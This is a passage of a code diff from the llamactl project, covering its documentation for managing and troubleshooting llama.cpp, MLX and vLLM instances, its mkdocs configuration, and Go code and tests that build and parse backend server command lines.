2. Enter a unique **Name** for your instance (only required field)
3. **Choose Backend Type**:
- **llama.cpp**: For GGUF models using llama-server
- **MLX**: For MLX-optimized models (macOS only)
- **vLLM**: For distributed serving and high-throughput inference
4. Configure model source:
- **For llama.cpp**: GGUF model path or HuggingFace repo
- **For MLX**: MLX model path or identifier (e.g., `mlx-community/Mistral-7B-Instruct-v0.3-4bit`)
- **For vLLM**: HuggingFace model identifier (e.g., `microsoft/DialoGPT-medium`)
5. Configure optional instance management settings:
- **Auto Restart**: Automatically restart instance on failure
- **Max Restarts**: Maximum number of restart attempts
- **Restart Delay**: Delay in seconds between restart attempts
- **On Demand Start**: Start instance when receiving a request to the OpenAI compatible endpoint
- **Idle Timeout**: Minutes before stopping idle instance (set to 0 to disable)
- **Environment Variables**: Set custom environment variables for the instance process
6. Configure backend-specific options:
- **llama.cpp**: Threads, context size, GPU layers, port, etc.
- **MLX**: Temperature, top-p, adapter path, Python environment, etc.
- **vLLM**: Tensor parallel size, GPU memory utilization, quantization, etc.
7. Click **"Create"** to save the instance
### Via API
```bash
# Create llama.cpp instance with local model file
curl -X POST http://localhost:8080/api/instances/my-llama-instance \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf",
"threads": 8,
"ctx_size": 4096,
"gpu_layers": 32
}
}'
# Create MLX instance (macOS only)
curl -X POST http://localhost:8080/api/instances/my-mlx-instance \
-H "Content-Type: application/json" \
-d '{
"backend_type": "mlx_lm",
"backend_options": {
"model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit",
"temp": 0.7,
"top_p": 0.9,
"max_tokens": 2048
},
"auto_restart": true,
"max_restarts": 3
}'
# Create vLLM instance
curl -X POST http://localhost:8080/api/instances/my-vllm-instance \
-H "Content-Type: application/json" \
-d '{
"backend_type": "vllm",
"backend_options": {
"model": "microsoft/DialoGPT-medium",
"tensor_parallel_size": 2,
"gpu_memory_utilization": 0.9
},
"auto_restart": true,
"on_demand_start": true,
"environment": {
"CUDA_VISIBLE_DEVICES": "0,1",
"NCCL_DEBUG": "INFO",
"PYTHONPATH": "/custom/path"
}
}'
# Create llama.cpp instance with HuggingFace model
curl -X POST http://localhost:8080/api/instances/gemma-3-27b \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"hf_repo": "unsloth/gemma-3-27b-it-GGUF",
"hf_file": "gemma-3-27b-it-GGUF.gguf",
"gpu_layers": 32
}
}'
```
## Start Instance
### Via Web UI
1. Click the **"Start"** button on an instance card
2. Watch the status change to "Unknown"
3. Monitor progress in the logs
4. The status changes to "Ready" once the instance is up
### Via API
```bash
curl -X POST http://localhost:8080/api/instances/{name}/start
```
## Stop Instance
### Via Web UI
1. Click the **"Stop"** button on an instance card
2. Instance gracefully shuts down
### Via API
```bash
curl -X POST http://localhost:8080/api/instances/{name}/stop
```
## Edit Instance
### Via Web UI
1. Click the **"Edit"** button on an instance card
2. Modify settings in the configuration dialog
3. Changes require instance restart to take effect
4. Click **"Update & Restart"** to apply changes
### Via API
Modify instance settings:
```bash
curl -X PUT http://localhost:8080/api/instances/{name} \
-H "Content-Type: application/json" \
-d '{
"backend_options": {
"threads": 8,
"context_size": 4096
}
}'
```
!!! note
Configuration changes require restarting the instance to take effect.
## View Logs
### Via Web UI
1. Click the **"Logs"** button on any instance card
2. Real-time log viewer opens
### Via API
Check instance status in real-time:
```bash
# Get instance details
curl http://localhost:8080/api/instances/{name}/logs
```
## Delete Instance
### Via Web UI
1. Click the **"Delete"** button on an instance card
2. Note that only stopped instances can be deleted
3. Confirm deletion in the dialog
### Via API
```bash
curl -X DELETE http://localhost:8080/api/instances/{name}
```
## Instance Proxy
Llamactl proxies all requests to the underlying backend instances (llama-server, MLX, or vLLM).
```bash
# Get instance details
curl http://localhost:8080/api/instances/{name}/proxy/
```
All backends provide OpenAI-compatible endpoints. Check the respective documentation:
- [llama-server docs](https://github.com/ggml-org/llama.cpp/blob/master/tools/server/README.md)
- [MLX-LM docs](https://github.com/ml-explore/mlx-lm/blob/main/mlx_lm/SERVER.md)
- [vLLM docs](https://docs.vllm.ai/en/latest/)
### Instance Health
#### Via Web UI
1. The health status badge is displayed on each instance card
#### Via API
Check the health status of your instances:
```bash
curl http://localhost:8080/api/instances/{name}/proxy/health
```

View File

@@ -0,0 +1,160 @@
# Troubleshooting
Issues specific to Llamactl deployment and operation.
## Configuration Issues
### Invalid Configuration
**Problem:** Invalid configuration preventing startup
**Solutions:**
1. Use minimal configuration:
```yaml
server:
host: "0.0.0.0"
port: 8080
instances:
port_range: [8000, 9000]
```
2. Check data directory permissions:
```bash
# Ensure data directory is writable (default: ~/.local/share/llamactl)
mkdir -p ~/.local/share/llamactl/{instances,logs}
```
## Instance Management Issues
### Model Loading Failures
**Problem:** Instance fails to start with model loading errors
**Common Solutions:**
- **llama-server not found:** Ensure `llama-server` binary is in PATH
- **Wrong model format:** Ensure model is in GGUF format
- **Insufficient memory:** Use smaller model or reduce context size
- **Path issues:** Use absolute paths to model files
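To quickly confirm the first point above, check that the `llama-server` binary is available (these commands assume it was installed as described in the Installation guide):
```bash
# Confirm llama-server is on PATH and reports a version
which llama-server
llama-server --version
```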
### Memory Issues
**Problem:** Out of memory errors or system becomes unresponsive
**Solutions:**
1. **Reduce context size:**
```json
{
"n_ctx": 1024
}
```
2. **Use quantized models:**
- Try Q4_K_M instead of higher precision models
- Use smaller model variants (7B instead of 13B)
### GPU Configuration
**Problem:** GPU not being used effectively
**Solutions:**
1. **Configure GPU layers:**
```json
{
"n_gpu_layers": 35
}
```
### Advanced Instance Issues
**Problem:** Complex model loading, performance, or compatibility issues
Since llamactl uses `llama-server` under the hood, many instance-related issues are actually llama.cpp issues. For advanced troubleshooting:
**Resources:**
- **llama.cpp Documentation:** [https://github.com/ggml-org/llama.cpp](https://github.com/ggml-org/llama.cpp)
- **llama.cpp Issues:** [https://github.com/ggml-org/llama.cpp/issues](https://github.com/ggml-org/llama.cpp/issues)
- **llama.cpp Discussions:** [https://github.com/ggml-org/llama.cpp/discussions](https://github.com/ggml-org/llama.cpp/discussions)
**Testing directly with llama-server:**
```bash
# Test your model and parameters directly with llama-server
llama-server --model /path/to/model.gguf --port 8081 --n-gpu-layers 35
```
This helps determine if the issue is with llamactl or with the underlying llama.cpp/llama-server.
## API and Network Issues
### CORS Errors
**Problem:** Web UI shows CORS errors in browser console
**Solutions:**
1. **Configure allowed origins:**
```yaml
server:
allowed_origins:
- "http://localhost:3000"
- "https://yourdomain.com"
```
## Authentication Issues
**Problem:** API requests failing with authentication errors
**Solutions:**
1. **Disable authentication temporarily:**
```yaml
auth:
require_management_auth: false
require_inference_auth: false
```
2. **Configure API keys:**
```yaml
auth:
management_keys:
- "your-management-key"
inference_keys:
- "your-inference-key"
```
3. **Use correct Authorization header:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances
```
## Debugging and Logs
### Viewing Instance Logs
```bash
# Get instance logs via API
curl http://localhost:8080/api/v1/instances/{name}/logs
# Or check log files directly
tail -f ~/.local/share/llamactl/logs/{instance-name}.log
```
### Enable Debug Logging
```bash
export LLAMACTL_LOG_LEVEL=debug
llamactl
```
## Getting Help
When reporting issues, include:
1. **System information:**
```bash
llamactl --version
```
2. **Configuration file** (remove sensitive keys)
3. **Relevant log output**
4. **Steps to reproduce the issue**

79
mkdocs.yml Normal file
View File

@@ -0,0 +1,79 @@
site_name: Llamactl Documentation
site_description: User documentation for Llamactl - A management tool for llama.cpp, MLX, and vLLM instances
site_author: Llamactl Team
site_url: https://llamactl.org
repo_name: lordmathis/llamactl
repo_url: https://github.com/lordmathis/llamactl
theme:
name: material
palette:
# Palette toggle for light mode
- scheme: default
primary: indigo
accent: indigo
toggle:
icon: material/brightness-7
name: Switch to dark mode
# Palette toggle for dark mode
- scheme: slate
primary: indigo
accent: indigo
toggle:
icon: material/brightness-4
name: Switch to light mode
features:
- navigation.tabs
- navigation.sections
- navigation.expand
- navigation.top
- search.highlight
- search.share
- content.code.copy
markdown_extensions:
- pymdownx.highlight:
anchor_linenums: true
- pymdownx.inlinehilite
- pymdownx.snippets
- pymdownx.superfences
- admonition
- pymdownx.details
- pymdownx.tabbed:
alternate_style: true
- attr_list
- md_in_html
- toc:
permalink: true
nav:
- Home: index.md
- Getting Started:
- Installation: getting-started/installation.md
- Quick Start: getting-started/quick-start.md
- Configuration: getting-started/configuration.md
- User Guide:
- Managing Instances: user-guide/managing-instances.md
- API Reference: user-guide/api-reference.md
- Troubleshooting: user-guide/troubleshooting.md
plugins:
- search
- git-revision-date-localized
- mike:
version_selector: true
css_dir: css
javascript_dir: js
canonical_version: null
hooks:
- docs/readme_sync.py
extra:
version:
provider: mike
default: stable
social:
- icon: fontawesome/brands/github
link: https://github.com/lordmathis/llamactl

10
pkg/backends/backend.go Normal file
View File

@@ -0,0 +1,10 @@
package backends
type BackendType string
const (
BackendTypeLlamaCpp BackendType = "llama_cpp"
BackendTypeMlxLm BackendType = "mlx_lm"
BackendTypeVllm BackendType = "vllm"
// BackendTypeMlxVlm BackendType = "mlx_vlm" // Future expansion
)

93
pkg/backends/builder.go Normal file
View File

@@ -0,0 +1,93 @@
package backends
import (
"fmt"
"llamactl/pkg/config"
"reflect"
"strconv"
"strings"
)
// BuildCommandArgs converts a struct to command line arguments
func BuildCommandArgs(options any, multipleFlags map[string]bool) []string {
var args []string
v := reflect.ValueOf(options).Elem()
t := v.Type()
for i := 0; i < v.NumField(); i++ {
field := v.Field(i)
fieldType := t.Field(i)
if !field.CanInterface() {
continue
}
jsonTag := fieldType.Tag.Get("json")
if jsonTag == "" || jsonTag == "-" {
continue
}
// Get flag name from JSON tag
flagName := strings.Split(jsonTag, ",")[0]
flagName = strings.ReplaceAll(flagName, "_", "-")
switch field.Kind() {
case reflect.Bool:
if field.Bool() {
args = append(args, "--"+flagName)
}
case reflect.Int:
if field.Int() != 0 {
args = append(args, "--"+flagName, strconv.FormatInt(field.Int(), 10))
}
case reflect.Float64:
if field.Float() != 0 {
args = append(args, "--"+flagName, strconv.FormatFloat(field.Float(), 'f', -1, 64))
}
case reflect.String:
if field.String() != "" {
args = append(args, "--"+flagName, field.String())
}
case reflect.Slice:
if field.Type().Elem().Kind() == reflect.String && field.Len() > 0 {
if multipleFlags[flagName] {
// Multiple flags: --flag value1 --flag value2
for j := 0; j < field.Len(); j++ {
args = append(args, "--"+flagName, field.Index(j).String())
}
} else {
// Comma-separated: --flag value1,value2
var values []string
for j := 0; j < field.Len(); j++ {
values = append(values, field.Index(j).String())
}
args = append(args, "--"+flagName, strings.Join(values, ","))
}
}
}
}
return args
}
// BuildDockerCommand builds a Docker command with the specified configuration and arguments
func BuildDockerCommand(backendConfig *config.BackendSettings, instanceArgs []string) (string, []string, error) {
// Start with configured Docker arguments (should include "run", "--rm", etc.)
dockerArgs := make([]string, len(backendConfig.Docker.Args))
copy(dockerArgs, backendConfig.Docker.Args)
// Add environment variables
for key, value := range backendConfig.Docker.Environment {
dockerArgs = append(dockerArgs, "-e", fmt.Sprintf("%s=%s", key, value))
}
// Add image name
dockerArgs = append(dockerArgs, backendConfig.Docker.Image)
// Add backend args and instance args
dockerArgs = append(dockerArgs, backendConfig.Args...)
dockerArgs = append(dockerArgs, instanceArgs...)
return "docker", dockerArgs, nil
}

View File

@@ -2,11 +2,33 @@ package llamacpp
import (
"encoding/json"
"llamactl/pkg/backends"
"reflect"
"strconv"
"strings"
)
// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated
// Used for both parsing (with underscores) and building (with dashes)
var multiValuedFlags = map[string]bool{
// Parsing keys (with underscores)
"override_tensor": true,
"override_kv": true,
"lora": true,
"lora_scaled": true,
"control_vector": true,
"control_vector_scaled": true,
"dry_sequence_breaker": true,
"logit_bias": true,
// Building keys (with dashes)
"override-tensor": true,
"override-kv": true,
"lora-scaled": true,
"control-vector": true,
"control-vector-scaled": true,
"dry-sequence-breaker": true,
"logit-bias": true,
}
type LlamaServerOptions struct {
// Common params
VerbosePrompt bool `json:"verbose_prompt,omitempty"`
@@ -315,62 +337,31 @@ func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error {
// BuildCommandArgs converts InstanceOptions to command line arguments
func (o *LlamaServerOptions) BuildCommandArgs() []string {
// Llama uses multiple flags for arrays by default (not comma-separated)
// Use package-level multiValuedFlags variable
return backends.BuildCommandArgs(o, multiValuedFlags)
}
func (o *LlamaServerOptions) BuildDockerArgs() []string {
// For llama, Docker args are the same as normal args
return o.BuildCommandArgs()
}
// ParseLlamaCommand parses a llama-server command string into LlamaServerOptions
// Supports multiple formats:
// 1. Full command: "llama-server --model file.gguf"
// 2. Full path: "/usr/local/bin/llama-server --model file.gguf"
// 3. Args only: "--model file.gguf --gpu-layers 32"
// 4. Multiline commands with backslashes
func ParseLlamaCommand(command string) (*LlamaServerOptions, error) {
executableNames := []string{"llama-server"}
var subcommandNames []string // Llama has no subcommands
// Use package-level multiValuedFlags variable
var llamaOptions LlamaServerOptions
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &llamaOptions); err != nil {
return nil, err
}
return &llamaOptions, nil
}


@@ -378,6 +378,121 @@ func TestUnmarshalJSON_ArrayFields(t *testing.T) {
}
}
func TestParseLlamaCommand(t *testing.T) {
tests := []struct {
name string
command string
expectErr bool
}{
{
name: "basic command",
command: "llama-server --model /path/to/model.gguf --gpu-layers 32",
expectErr: false,
},
{
name: "args only",
command: "--model /path/to/model.gguf --ctx-size 4096",
expectErr: false,
},
{
name: "mixed flag formats",
command: "llama-server --model=/path/model.gguf --gpu-layers 16 --verbose",
expectErr: false,
},
{
name: "quoted strings",
command: `llama-server --model test.gguf --api-key "sk-1234567890abcdef"`,
expectErr: false,
},
{
name: "empty command",
command: "",
expectErr: true,
},
{
name: "unterminated quote",
command: `llama-server --model test.gguf --api-key "unterminated`,
expectErr: true,
},
{
name: "malformed flag",
command: "llama-server ---model test.gguf",
expectErr: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result, err := llamacpp.ParseLlamaCommand(tt.command)
if tt.expectErr {
if err == nil {
t.Errorf("expected error but got none")
}
return
}
if err != nil {
t.Errorf("unexpected error: %v", err)
return
}
if result == nil {
t.Errorf("expected result but got nil")
}
})
}
}
func TestParseLlamaCommandValues(t *testing.T) {
command := "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap"
result, err := llamacpp.ParseLlamaCommand(command)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if result.Model != "/test/model.gguf" {
t.Errorf("expected model '/test/model.gguf', got '%s'", result.Model)
}
if result.GPULayers != 32 {
t.Errorf("expected gpu_layers 32, got %d", result.GPULayers)
}
if result.Temperature != 0.7 {
t.Errorf("expected temperature 0.7, got %f", result.Temperature)
}
if !result.Verbose {
t.Errorf("expected verbose to be true")
}
if !result.NoMmap {
t.Errorf("expected no_mmap to be true")
}
}
func TestParseLlamaCommandArrays(t *testing.T) {
command := "llama-server --model test.gguf --lora adapter1.bin --lora=adapter2.bin"
result, err := llamacpp.ParseLlamaCommand(command)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if len(result.Lora) != 2 {
t.Errorf("expected 2 lora adapters, got %d", len(result.Lora))
}
expected := []string{"adapter1.bin", "adapter2.bin"}
for i, v := range expected {
if result.Lora[i] != v {
t.Errorf("expected lora[%d]=%s got %s", i, v, result.Lora[i])
}
}
}
// Helper functions
func contains(slice []string, item string) bool {
return slices.Contains(slice, item)

pkg/backends/mlx/mlx.go (new file, 56 lines)

@@ -0,0 +1,56 @@
package mlx
import (
"llamactl/pkg/backends"
)
type MlxServerOptions struct {
// Basic connection options
Model string `json:"model,omitempty"`
Host string `json:"host,omitempty"`
Port int `json:"port,omitempty"`
// Model and adapter options
AdapterPath string `json:"adapter_path,omitempty"`
DraftModel string `json:"draft_model,omitempty"`
NumDraftTokens int `json:"num_draft_tokens,omitempty"`
TrustRemoteCode bool `json:"trust_remote_code,omitempty"`
// Logging and templates
LogLevel string `json:"log_level,omitempty"`
ChatTemplate string `json:"chat_template,omitempty"`
UseDefaultChatTemplate bool `json:"use_default_chat_template,omitempty"`
ChatTemplateArgs string `json:"chat_template_args,omitempty"` // JSON string
// Sampling defaults
Temp float64 `json:"temp,omitempty"`
TopP float64 `json:"top_p,omitempty"`
TopK int `json:"top_k,omitempty"`
MinP float64 `json:"min_p,omitempty"`
MaxTokens int `json:"max_tokens,omitempty"`
}
// BuildCommandArgs converts to command line arguments
func (o *MlxServerOptions) BuildCommandArgs() []string {
multipleFlags := map[string]bool{} // MLX doesn't currently have []string fields
return backends.BuildCommandArgs(o, multipleFlags)
}
// ParseMlxCommand parses a mlx_lm.server command string into MlxServerOptions
// Supports multiple formats:
// 1. Full command: "mlx_lm.server --model model/path"
// 2. Full path: "/usr/local/bin/mlx_lm.server --model model/path"
// 3. Args only: "--model model/path --host 0.0.0.0"
// 4. Multiline commands with backslashes
func ParseMlxCommand(command string) (*MlxServerOptions, error) {
executableNames := []string{"mlx_lm.server"}
var subcommandNames []string // MLX has no subcommands
multiValuedFlags := map[string]bool{} // MLX has no multi-valued flags
var mlxOptions MlxServerOptions
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil {
return nil, err
}
return &mlxOptions, nil
}


@@ -0,0 +1,157 @@
package mlx_test
import (
"llamactl/pkg/backends/mlx"
"testing"
)
func TestParseMlxCommand(t *testing.T) {
tests := []struct {
name string
command string
expectErr bool
}{
{
name: "basic command",
command: "mlx_lm.server --model /path/to/model --host 0.0.0.0",
expectErr: false,
},
{
name: "args only",
command: "--model /path/to/model --port 8080",
expectErr: false,
},
{
name: "mixed flag formats",
command: "mlx_lm.server --model=/path/model --temp=0.7 --trust-remote-code",
expectErr: false,
},
{
name: "quoted strings",
command: `mlx_lm.server --model test.mlx --chat-template "User: {user}\nAssistant: "`,
expectErr: false,
},
{
name: "empty command",
command: "",
expectErr: true,
},
{
name: "unterminated quote",
command: `mlx_lm.server --model test.mlx --chat-template "unterminated`,
expectErr: true,
},
{
name: "malformed flag",
command: "mlx_lm.server ---model test.mlx",
expectErr: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result, err := mlx.ParseMlxCommand(tt.command)
if tt.expectErr {
if err == nil {
t.Errorf("expected error but got none")
}
return
}
if err != nil {
t.Errorf("unexpected error: %v", err)
return
}
if result == nil {
t.Errorf("expected result but got nil")
}
})
}
}
func TestParseMlxCommandValues(t *testing.T) {
command := "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG"
result, err := mlx.ParseMlxCommand(command)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if result.Model != "/test/model.mlx" {
t.Errorf("expected model '/test/model.mlx', got '%s'", result.Model)
}
if result.Port != 8080 {
t.Errorf("expected port 8080, got %d", result.Port)
}
if result.Temp != 0.7 {
t.Errorf("expected temp 0.7, got %f", result.Temp)
}
if !result.TrustRemoteCode {
t.Errorf("expected trust_remote_code to be true")
}
if result.LogLevel != "DEBUG" {
t.Errorf("expected log_level 'DEBUG', got '%s'", result.LogLevel)
}
}
func TestBuildCommandArgs(t *testing.T) {
options := &mlx.MlxServerOptions{
Model: "/test/model.mlx",
Host: "127.0.0.1",
Port: 8080,
Temp: 0.7,
TopP: 0.9,
TopK: 40,
MaxTokens: 2048,
TrustRemoteCode: true,
LogLevel: "DEBUG",
ChatTemplate: "custom template",
}
args := options.BuildCommandArgs()
// Check that all expected flags are present
expectedFlags := map[string]string{
"--model": "/test/model.mlx",
"--host": "127.0.0.1",
"--port": "8080",
"--log-level": "DEBUG",
"--chat-template": "custom template",
"--temp": "0.7",
"--top-p": "0.9",
"--top-k": "40",
"--max-tokens": "2048",
}
for i := 0; i < len(args); i++ {
if args[i] == "--trust-remote-code" {
continue // Boolean flag with no value
}
if args[i] == "--use-default-chat-template" {
continue // Boolean flag with no value
}
if expectedValue, exists := expectedFlags[args[i]]; exists && i+1 < len(args) {
if args[i+1] != expectedValue {
t.Errorf("expected %s to have value %s, got %s", args[i], expectedValue, args[i+1])
}
}
}
// Check boolean flags
foundTrustRemoteCode := false
for _, arg := range args {
if arg == "--trust-remote-code" {
foundTrustRemoteCode = true
}
}
if !foundTrustRemoteCode {
t.Errorf("expected --trust-remote-code flag to be present")
}
}

pkg/backends/parser.go (new file, 213 lines)

@@ -0,0 +1,213 @@
package backends
import (
"encoding/json"
"fmt"
"path/filepath"
"regexp"
"strconv"
"strings"
)
// ParseCommand parses a command string into a target struct
func ParseCommand(command string, executableNames []string, subcommandNames []string, multiValuedFlags map[string]bool, target any) error {
// Normalize multiline commands
command = normalizeCommand(command)
if command == "" {
return fmt.Errorf("command cannot be empty")
}
// Extract arguments and positional model
args, modelFromPositional, err := extractArgs(command, executableNames, subcommandNames)
if err != nil {
return err
}
// Parse flags into map
options, err := parseFlags(args, multiValuedFlags)
if err != nil {
return err
}
// If we found a positional model and no --model flag was provided, set the model
if modelFromPositional != "" {
if _, hasModelFlag := options["model"]; !hasModelFlag {
options["model"] = modelFromPositional
}
}
// Convert to target struct via JSON
jsonData, err := json.Marshal(options)
if err != nil {
return fmt.Errorf("failed to marshal options: %w", err)
}
if err := json.Unmarshal(jsonData, target); err != nil {
return fmt.Errorf("failed to unmarshal to target: %w", err)
}
return nil
}
// normalizeCommand handles multiline commands with backslashes
func normalizeCommand(command string) string {
re := regexp.MustCompile(`\\\s*\n\s*`)
normalized := re.ReplaceAllString(command, " ")
re = regexp.MustCompile(`\s+`)
return strings.TrimSpace(re.ReplaceAllString(normalized, " "))
}
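// Minimal sketch of what normalizeCommand does to a backslash-continued command.
func exampleNormalizeCommand() string {
multiline := "llama-server \\\n  --model /models/m.gguf \\\n  --gpu-layers 32"
// Returns "llama-server --model /models/m.gguf --gpu-layers 32"
return normalizeCommand(multiline)
}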
// extractArgs extracts arguments from command, removing executable and subcommands
// Returns: args, modelFromPositional, error
func extractArgs(command string, executableNames []string, subcommandNames []string) ([]string, string, error) {
// Check for unterminated quotes
if strings.Count(command, `"`)%2 != 0 || strings.Count(command, `'`)%2 != 0 {
return nil, "", fmt.Errorf("unterminated quoted string")
}
tokens := strings.Fields(command)
if len(tokens) == 0 {
return nil, "", fmt.Errorf("no tokens found")
}
// Skip executable
start := 0
firstToken := tokens[0]
// Check for executable name (with or without path)
if strings.Contains(firstToken, string(filepath.Separator)) {
baseName := filepath.Base(firstToken)
for _, execName := range executableNames {
if strings.HasSuffix(strings.ToLower(baseName), strings.ToLower(execName)) {
start = 1
break
}
}
} else {
for _, execName := range executableNames {
if strings.EqualFold(firstToken, execName) {
start = 1
break
}
}
}
// Skip subcommand if present
if start < len(tokens) {
for _, subCmd := range subcommandNames {
if strings.EqualFold(tokens[start], subCmd) {
start++
break
}
}
}
// Handle case where command starts with subcommand (no executable)
if start == 0 {
for _, subCmd := range subcommandNames {
if strings.EqualFold(firstToken, subCmd) {
start = 1
break
}
}
}
args := tokens[start:]
// Extract first positional argument (model) if present and not a flag
var modelFromPositional string
if len(args) > 0 && !strings.HasPrefix(args[0], "-") {
modelFromPositional = args[0]
args = args[1:] // Remove the model from args to process remaining flags
}
return args, modelFromPositional, nil
}
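// Minimal sketch of extractArgs: the executable and subcommand tokens are skipped
// and a leading positional argument is treated as the model. The model name is a placeholder.
func exampleExtractArgs() ([]string, string, error) {
// Returns args ["--gpu-memory-utilization", "0.8"], model "my-org/my-model", nil.
return extractArgs("vllm serve my-org/my-model --gpu-memory-utilization 0.8", []string{"vllm"}, []string{"serve"})
}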
// parseFlags parses command line flags into a map
func parseFlags(args []string, multiValuedFlags map[string]bool) (map[string]any, error) {
options := make(map[string]any)
for i := 0; i < len(args); i++ {
arg := args[i]
if !strings.HasPrefix(arg, "-") {
continue
}
// Check for malformed flags (more than two leading dashes)
if strings.HasPrefix(arg, "---") {
return nil, fmt.Errorf("malformed flag: %s", arg)
}
// Get flag name and value
var flagName, value string
var hasValue bool
if strings.Contains(arg, "=") {
parts := strings.SplitN(arg, "=", 2)
flagName = strings.TrimLeft(parts[0], "-")
value = parts[1]
hasValue = true
} else {
flagName = strings.TrimLeft(arg, "-")
if i+1 < len(args) && !strings.HasPrefix(args[i+1], "-") {
value = args[i+1]
hasValue = true
i++ // Skip next arg since we consumed it
}
}
// Convert kebab-case to snake_case for JSON
flagName = strings.ReplaceAll(flagName, "-", "_")
if hasValue {
// Handle multi-valued flags
if multiValuedFlags[flagName] {
if existing, ok := options[flagName].([]string); ok {
options[flagName] = append(existing, value)
} else {
options[flagName] = []string{value}
}
} else {
options[flagName] = parseValue(value)
}
} else {
// Boolean flag
options[flagName] = true
}
}
return options, nil
}
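// Minimal sketch of parseFlags: flag names become snake_case keys, repeated
// multi-valued flags accumulate into a slice, and bare flags become booleans.
func exampleParseFlags() (map[string]any, error) {
args := []string{"--gpu-layers", "32", "--verbose", "--lora", "a.bin", "--lora=b.bin"}
// Returns {"gpu_layers": 32, "verbose": true, "lora": ["a.bin", "b.bin"]}, nil.
return parseFlags(args, map[string]bool{"lora": true})
}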
// parseValue converts string to appropriate type
func parseValue(value string) any {
// Remove quotes
if len(value) >= 2 {
if (value[0] == '"' && value[len(value)-1] == '"') || (value[0] == '\'' && value[len(value)-1] == '\'') {
value = value[1 : len(value)-1]
}
}
// Try boolean
switch strings.ToLower(value) {
case "true":
return true
case "false":
return false
}
// Try integer
if intVal, err := strconv.Atoi(value); err == nil {
return intVal
}
// Try float
if floatVal, err := strconv.ParseFloat(value, 64); err == nil {
return floatVal
}
// Return as string
return value
}
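// Minimal sketch of parseValue's coercion order: quotes stripped, then bool,
// int, float, and finally plain string.
func exampleParseValue() []any {
return []any{
parseValue("true"),    // true (bool)
parseValue("8080"),    // 8080 (int)
parseValue("0.7"),     // 0.7 (float64)
parseValue(`"hello"`), // "hello" (quotes removed, stays a string)
}
}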

pkg/backends/vllm/vllm.go (new file, 200 lines)

@@ -0,0 +1,200 @@
package vllm
import (
"llamactl/pkg/backends"
)
// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated
var multiValuedFlags = map[string]bool{
"api-key": true,
"allowed-origins": true,
"allowed-methods": true,
"allowed-headers": true,
"middleware": true,
}
type VllmServerOptions struct {
// Basic connection options (auto-assigned by llamactl)
Host string `json:"host,omitempty"`
Port int `json:"port,omitempty"`
// Model and engine configuration
Model string `json:"model,omitempty"`
Tokenizer string `json:"tokenizer,omitempty"`
SkipTokenizerInit bool `json:"skip_tokenizer_init,omitempty"`
Revision string `json:"revision,omitempty"`
CodeRevision string `json:"code_revision,omitempty"`
TokenizerRevision string `json:"tokenizer_revision,omitempty"`
TokenizerMode string `json:"tokenizer_mode,omitempty"`
TrustRemoteCode bool `json:"trust_remote_code,omitempty"`
DownloadDir string `json:"download_dir,omitempty"`
LoadFormat string `json:"load_format,omitempty"`
ConfigFormat string `json:"config_format,omitempty"`
Dtype string `json:"dtype,omitempty"`
KVCacheDtype string `json:"kv_cache_dtype,omitempty"`
QuantizationParamPath string `json:"quantization_param_path,omitempty"`
Seed int `json:"seed,omitempty"`
MaxModelLen int `json:"max_model_len,omitempty"`
GuidedDecodingBackend string `json:"guided_decoding_backend,omitempty"`
DistributedExecutorBackend string `json:"distributed_executor_backend,omitempty"`
WorkerUseRay bool `json:"worker_use_ray,omitempty"`
RayWorkersUseNSight bool `json:"ray_workers_use_nsight,omitempty"`
// Performance and serving configuration
BlockSize int `json:"block_size,omitempty"`
EnablePrefixCaching bool `json:"enable_prefix_caching,omitempty"`
DisableSlidingWindow bool `json:"disable_sliding_window,omitempty"`
UseV2BlockManager bool `json:"use_v2_block_manager,omitempty"`
NumLookaheadSlots int `json:"num_lookahead_slots,omitempty"`
SwapSpace int `json:"swap_space,omitempty"`
CPUOffloadGB int `json:"cpu_offload_gb,omitempty"`
GPUMemoryUtilization float64 `json:"gpu_memory_utilization,omitempty"`
NumGPUBlocksOverride int `json:"num_gpu_blocks_override,omitempty"`
MaxNumBatchedTokens int `json:"max_num_batched_tokens,omitempty"`
MaxNumSeqs int `json:"max_num_seqs,omitempty"`
MaxLogprobs int `json:"max_logprobs,omitempty"`
DisableLogStats bool `json:"disable_log_stats,omitempty"`
Quantization string `json:"quantization,omitempty"`
RopeScaling string `json:"rope_scaling,omitempty"`
RopeTheta float64 `json:"rope_theta,omitempty"`
EnforceEager bool `json:"enforce_eager,omitempty"`
MaxContextLenToCapture int `json:"max_context_len_to_capture,omitempty"`
MaxSeqLenToCapture int `json:"max_seq_len_to_capture,omitempty"`
DisableCustomAllReduce bool `json:"disable_custom_all_reduce,omitempty"`
TokenizerPoolSize int `json:"tokenizer_pool_size,omitempty"`
TokenizerPoolType string `json:"tokenizer_pool_type,omitempty"`
TokenizerPoolExtraConfig string `json:"tokenizer_pool_extra_config,omitempty"`
EnableLoraBias bool `json:"enable_lora_bias,omitempty"`
LoraExtraVocabSize int `json:"lora_extra_vocab_size,omitempty"`
LoraRank int `json:"lora_rank,omitempty"`
PromptLookbackDistance int `json:"prompt_lookback_distance,omitempty"`
PreemptionMode string `json:"preemption_mode,omitempty"`
// Distributed and parallel processing
TensorParallelSize int `json:"tensor_parallel_size,omitempty"`
PipelineParallelSize int `json:"pipeline_parallel_size,omitempty"`
MaxParallelLoadingWorkers int `json:"max_parallel_loading_workers,omitempty"`
DisableAsyncOutputProc bool `json:"disable_async_output_proc,omitempty"`
WorkerClass string `json:"worker_class,omitempty"`
EnabledLoraModules string `json:"enabled_lora_modules,omitempty"`
MaxLoraRank int `json:"max_lora_rank,omitempty"`
FullyShardedLoras bool `json:"fully_sharded_loras,omitempty"`
